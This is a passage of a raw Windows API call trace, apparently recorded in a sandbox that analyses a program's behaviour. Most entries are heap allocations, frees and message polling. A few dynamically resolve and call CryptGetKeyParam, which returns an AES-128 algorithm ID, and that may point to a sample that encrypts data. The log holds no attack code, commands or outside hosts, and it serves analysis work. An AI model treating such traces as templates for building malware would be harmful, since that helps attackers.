wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0169.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0169.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0169.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0169.065] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0169.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0169.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0169.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0169.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0169.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0169.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0169.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0169.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0169.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0169.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0169.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0169.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0169.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0169.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0169.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0169.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0169.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0169.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0169.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0169.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0169.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0169.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0169.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0169.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0169.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0169.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0169.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0169.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0169.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0169.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0169.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0169.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0169.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0169.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0169.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0169.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0169.071] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0169.071] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c26e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0169.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0169.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0169.073] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0169.073] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0169.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0169.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 